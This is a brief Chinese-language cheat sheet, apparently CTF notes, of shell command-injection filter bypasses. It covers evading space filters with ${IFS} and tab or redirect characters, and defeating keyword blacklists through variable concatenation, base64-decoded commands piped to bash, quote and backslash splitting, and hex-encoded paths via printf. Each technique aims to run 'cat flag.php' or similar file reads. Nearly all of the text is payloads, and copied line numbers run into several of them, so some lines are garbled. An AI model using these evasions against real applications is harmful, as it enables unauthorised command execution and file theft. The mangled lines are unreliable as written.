空格过滤
${IFS}${IFS}$1$IFS$1<><%09(需要PHP环境)
黑名单绕过
拼接
1
2a=c;b=at;c=ag.php;d=fl;$a$b $d$c
//相当于cat flag.php
base64编码
payload11
2`echo "Y2F0IGZsYWcucGhw"|base64 -d`
//相当于cat flag.php
base64编码
payload21
2echo "Y2F0IGZsYWcucGhw"|base64 -d|bash
//相当于cat flag.php单引号,双引号
1
c""at fla''g.php
反斜杠
\1
c\at fl\ag\.php
可以使用
;代替&以及|等运算符路径文字过滤,转换成16进制字符串
$(printf "路径")例如:
flag_is_here/flag_17486130983526.php可以转化为:
$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x34\x38\x36\x31\x33\x30\x39\x38\x33\x35\x32\x36\x2e\x70\x68\x70")